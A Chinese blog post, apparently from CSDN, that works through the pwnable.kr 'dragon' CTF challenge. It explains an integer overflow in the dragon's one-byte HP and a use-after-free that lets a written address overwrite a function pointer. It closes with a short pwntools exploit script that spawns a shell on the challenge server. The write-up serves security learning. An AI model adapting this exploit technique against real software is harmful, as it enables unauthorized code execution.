pwnable dragon

最新推荐文章于 2020-06-12 00:01:36 发布
最新推荐文章于 2020-06-12 00:01:36 发布
阅读量641 收藏
点赞数
分类专栏: Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31481187/article/details/73657041
版权

借着这段时间学UAF,又找了一道UAF的题目做了一下,这个题目很简单,看着WP写的,思路也非常的清晰。

题目地址:
nc pwnable.kr 9004
题目下载:
http://pwnable.kr/bin/dragon

0x01 简单分析

这题是让我们打龙,首先利用IDA查看龙的相关信息
这里写图片描述
上面是两个龙的结构体

又发现了一个神秘关卡
这里写图片描述

里面有要获取的shell

发现在杀死龙之后会释放龙内存,同时也会重新申请相同大小的内存进行写入而且偏移量正好是龙结构体的函数指针处。这样我们就能利用UAF(释放重利用)控制整个程序流。下面第一个难题是怎样杀死一条龙。

0x02 屠龙

Priest
这里写图片描述
Knight
这里写图片描述

我们发现如果是直接想把龙打死是不可能的但是我们发现了一个技能Priest的3技能
可以是龙的回升.同时发现大龙的血是80 一个字节127可以使其溢出,从而把大龙打死。

0x03 编写exp

from pwn import *
sh = remote('pwnable.kr',9004) #process('./dragon')


def killself(sh):
    for i in range(0,3):
        sh.send('1'+'\n')
def killdragon(sh):
    for i in range(0,4):
        sh.send('3'+'\n')
        sh.send('3'+'\n')
        sh.send('2'+'\n')       


killself(sh)
sh.send('1'+'\n')
killdragon(sh)
sh.send(p32(0x08048DBF))
sh.interactive()

这里写图片描述

4ct10n
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dragon说明书
06-28
蒙特卡洛程序一种,dragon为蒙特卡洛程序的一种程序,用于粒子输运的模拟计算。
pwnable[dragon](uaf)
九层台
01-24 346
很有意思的一个题目,做成了一个打龙,要是有个图形界面就更有意思了。这个题出乎意料的地方是漏洞的地方仅仅是free了之后对里面的值再操作。我的思维总以为一定要free了之后再malloc才会有漏洞的。改掉这个思维定式。 分析开始。 0x01数据结构 在这里可以看出来 0x02漏洞分析 PriestAttack函数中无论杀没杀死龙都会把龙free 但是在这里继续使用了龙结构里面的值。 接下来就是...
pwnable_dragon(整数溢出+UAF)
seaaseesa的博客
06-12 421
pwnable_dragon(整数溢出+UAF) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,游戏结束后释放掉了ptr 也就是释放掉了v5,而当我们打赢游戏的时候,又malloc(0x10)并输入,然后又调用了v5里面的函数指针,由于v5之前free掉了,所以这里malloc(0x10)并输入,控制的就是v5指向的那块内存,将里面指针指向后面函数即可。 现在是如何才能赢得游戏,观察龙的血量,是一个byte 而赢得游戏的条件是龙的血量小于等于0 Byte的话超过1
核反应堆Fortran计算软件Dragon/Donjon
u012525929的博客
08-28 2871
Dragon/Donjon软件是加拿大蒙特利尔大学开发的基于Fortran语言开发的反应堆物理计算软件。现在较流行的版本是Version4和Version5。 What is the Version4 project Version4 is a recent distribution of the reactor physics codes developed at École Polytec...
pwnable.kr dragon
you_need_me的博客
06-05 333
http://blog.sina.com.cn/s/blog_e23a215b0102wiap.html
allwinner dragon face
11-22
DragonFace使用说明_v2.2.5
dragon软件
08-03
The development of DRAGON has been financially supported along the years, directly or indirectly, by various organizations including ´Ecole Polytechnique de Montr´eal, Hydro-Qu´ebec and the Hydro-...
RMTool dragon 1.4
10-23
RMTool for dragon server raja 1.4
Stanford Dragon Model
04-06
Stanford Dragon Model 包括max,ase,dwf,mtl,obj五种格式
PWN dragon echo1 echo2 [pwnable.kr]CTF writeup题解系列16
重新启程
01-06 563
由于pwnable.kr说明了不要将题解的利用脚本直接提出来,所以我就简单说下思路,本篇包括三个题目 目录 0x01 dragon 0x02 echo1 0x03 echo2 0x01 dragon 执行步骤 整数溢出漏洞:pDragon->HP 的类型是 signed byte,所以当超过127,就是负数了。这就是整数溢出漏洞 uaf漏洞: 1. malloc person...
核反应堆
weixin_30247781的博客
08-22 90
核反应堆 Time Limit : 1000/1000ms (Java/Other)Memory Limit : 32768/32768K (Java/Other) Total Submission(s) : 22Accepted Submission(s) : 13 Problem Description 某核反应堆有两类事件发生: 高能质点碰击核子时,质点被吸收,放出3个高...
pwnable.kr】 dragon
子曰小玖的博客
06-06 459
https://r00tnb.github.io/2018/02/27/pwnable.kr-dragon/ 前言 这道题找溢出找了半天,游戏也玩了半天,唉最后还是细心读代码找出了漏洞。这是一个c语言不同类型比较隐式转换导致的漏洞,还是有点意思的。 分析 放ida逆向一下,程序代码逻辑有点长,不过认真读的话还是能理解的。 1 2 3 4 5 6 7 8 9 10 11 12...
pwnable.kr - md5 calculator
加号减减号的博客
03-07 1795
题目简介 分析 wirteup 参考资料 题目简介 题目给出的信息如下: 可知该题实现了一个 MD5 计算器,并且给出了一个提示,提示稍后再说。做这道题我学到了一个新的技能,就是 python 里面的 os.popen() 的用法,觉得十分有用,希望对大家也有帮助。 分析 下载得到文件,IDA 分析得到 main 函数如下: 这里可以得知几个关键的信息,...
UAF (Use After Free)漏洞分析及利用
热门推荐
4ct10n
06-23 2万+
因为大作业的需求要调试一个浏览器的UAF漏洞,首先必须对UAF漏洞有个整体的了解,本篇文章主要讲解UAF造成的原因以及利用方法,这里结合2016年HCTF fheap
Linux 格式化字符串漏洞利用
4ct10n
05-18 6950
目的是接触一些常见的漏洞,增加自己的视野。格式化字符串危害最大的就两点,一点是leak memory,一点就是可以在内存中写入数据,简单来说就是格式化字符串可以进行内存地址的读写。下面结合着自己的学习经历,把漏洞详细的讲解一下,附上大量的实例。
堆溢出利用
4ct10n
05-02 6461
堆的工作原理与利用
Linux SROP 原理与攻击
4ct10n
06-30 2662
理解并掌握基本的SROP理论以及其攻击方法,这里主要结合freebuf的文章http://www.freebuf.com/articles/network/87447.html,以及i春秋360杯和2017广东省红帽杯的题目路整理一下思路。
nodejs-x64-0.10.21.tgz
最新发布
05-11
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
dragon计算描述符
07-28
Dragon计算描述符是一种基于深度学习的计算机视觉方法,用于对图像和视频中的目标进行检测和分类。该方法是通过训练神经网络来学习目标的特征,并将其转化为一个描述符。这个描述符可以用来比较和匹配目标,从而实现...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值